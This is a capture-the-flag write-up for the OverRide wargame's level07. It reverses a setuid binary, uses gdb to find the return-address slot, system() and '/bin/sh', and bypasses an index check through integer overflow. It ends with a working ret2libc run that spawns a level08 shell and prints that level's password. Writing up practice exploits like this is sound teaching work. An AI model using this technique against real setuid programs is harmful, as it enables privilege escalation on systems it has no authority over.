
```bash
level07@OverRide:~$ ls -l
total 12
-rwsr-s---+ 1 level08 users 11744 Sep 10  2016 level07
level07@OverRide:~$ file level07 
level07: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xf5b46cdb878d5a3929cc27efbda825294de5661e, not stripped
level07@OverRide:~$ checksec --file level07 
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
Partial RELRO   Canary found      NX disabled   No PIE          No RPATH   No RUNPATH   level07
```

Reversed in c:
```c
int store_number(char *tab)
{
  unsigned int number; // [esp+18h] [ebp-10h]
  unsigned int index; // [esp+1Ch] [ebp-Ch]

  printf(" Number: ");
  number = get_unum();
  printf(" Index: ");
  index = get_unum();
  if ( index == 3 * (index / 3) || HIBYTE(number) == 0xB7 )
  {
    puts(" *** ERROR! ***");
    puts("   This index is reserved for wil!");
    puts(" *** ERROR! ***");
    return 1;
  }
  else
  {
    *(unsigned int *)(tab + 4 * index) = number;
    return 0;
  }
}
```
We can see that store_number() can write after the tab in the stack.

First we need to find where we are:
```bash
(gdb) x/4x $ebp
0xffffd5f8:	0x00000000	0xf7e45513	0x00000001	0xffffd694
(gdb) x/124x $esp
0xffffd410:	0xffffd5c8	0x00000014	0xf7fcfac0	0xf7fdc714
0xffffd420:	0x00000098	0xffffffff	0xffffd6f4	0xffffd698
0xffffd430:	0x00000000	0x00000000	0x00000001	0x00000002 # start of tab
0xffffd440:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd450:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd460:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd470:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd480:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd490:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd4a0:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd4b0:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd4c0:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd4d0:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd4e0:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd4f0:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd500:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd510:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd520:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd530:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd540:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd550:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd560:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd570:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd580:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd590:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd5a0:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd5b0:	0x00000000	0x00000000	0x00000000	0x00000000
0xffffd5c0:	0x00000000	0x00000001	0x00000000	0x00000000
0xffffd5d0:	0x00000000	0x00000000	0x00000000	0x72104000
0xffffd5e0:	0xf7feb620	0x00000000	0x08048a09	0xf7fceff4
0xffffd5f0:	0x00000000	0x00000000	0x00000000	0xf7e45513 # eip return value
```

eip value is at index `114`, we need to overwrite it with the index `114`, sadly 114 do not pass the check.

Now look for gadgets :
```
(gdb) info functions system
All functions matching regular expression "system":

Non-debugging symbols:
0xf7e6aed0  __libc_system
0xf7e6aed0  system
0xf7f48a50  svcerr_systemerr
(gdb) print system
$6 = {<text variable, no debug info>} 0xf7e6aed0 <system>
(gdb) print execl
$7 = {<text variable, no debug info>} 0xf7ee48e0 <execl>
(gdb) info address system
Symbol "system" is at 0xf7e6aed0 in a file compiled without debugging.
(gdb) info proc mappings
process 1953
Mapped address spaces:

	Start Addr   End Addr       Size     Offset objfile
	 0x8048000  0x8049000     0x1000        0x0 /home/users/level07/level07
	 0x8049000  0x804a000     0x1000     0x1000 /home/users/level07/level07
	 0x804a000  0x804b000     0x1000     0x2000 /home/users/level07/level07
	 0x804b000  0x806c000    0x21000        0x0 [heap]
	0xf7e2b000 0xf7e2c000     0x1000        0x0 
	0xf7e2c000 0xf7fcc000   0x1a0000        0x0 /lib32/libc-2.15.so
	0xf7fcc000 0xf7fcd000     0x1000   0x1a0000 /lib32/libc-2.15.so
	0xf7fcd000 0xf7fcf000     0x2000   0x1a0000 /lib32/libc-2.15.so
	0xf7fcf000 0xf7fd0000     0x1000   0x1a2000 /lib32/libc-2.15.so
	0xf7fd0000 0xf7fd4000     0x4000        0x0 
	0xf7fda000 0xf7fdb000     0x1000        0x0 
	0xf7fdb000 0xf7fdc000     0x1000        0x0 [vdso]
	0xf7fdc000 0xf7ffc000    0x20000        0x0 /lib32/ld-2.15.so
	0xf7ffc000 0xf7ffd000     0x1000    0x1f000 /lib32/ld-2.15.so
	0xf7ffd000 0xf7ffe000     0x1000    0x20000 /lib32/ld-2.15.so
	0xfffdd000 0xffffe000    0x21000        0x0 [stack]
(gdb) find 0xf7e2c000, 0xf7fcc000, "/bin/sh"
0xf7f897ec
1 pattern found.
```

The idea is to over write the return address at tab[114]:
```
(gdb) p (0xffffd70c - 0xffffd544) / 4
$12 = 114
```
To obtain sth like this:
114 (eip) : 4159090384 (system address)
116 (system's arg) : 4160264172 (/bin/sh address)

But 114 will be blocked by `index == 3 * (index / 3)`, we need other numbers.
We observed that in `(gdb) disas store_number`: 
`
   0x080486c0 <+144>:	jmp    0x80486d5 <store_number+165>
   0x080486c2 <+146>:	mov    eax,DWORD PTR [ebp-0xc]
   0x080486c5 <+149>:	shl    eax,0x2
`
The index will be multiplied by 4 by `shl eax,0x2`, which truncs the first 2 higher bits!
So we can try sth like `0100 0000 0000 0000 0000 0000 0000 0000` + 114, 
(gdb) p/d 0b01000000000000000000000000000000
$25 = 1073741824
(gdb) p/d $25 + 114
$26 = 1073741938
(gdb) p/d $26 % 3
$27 = 1

Try and get it:
```
level07@OverRide:~$ ./level07 
----------------------------------------------------
  Welcome to wil's crappy number storage service!   
----------------------------------------------------
 Commands:                                          
    store - store a number into the data storage    
    read  - read a number from the data storage     
    quit  - exit the program                        
----------------------------------------------------
   wil has reserved some storage :>                 
----------------------------------------------------

Input command: store
 Number: 4159090384
 Index: 1073741938 
 Completed store command successfully
Input command: store
 Number: 4160264172
 Index: 116
 Completed store command successfully
Input command: quit
$ whoami
level08
$ cat /home/users/level08/.pass                
7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC
```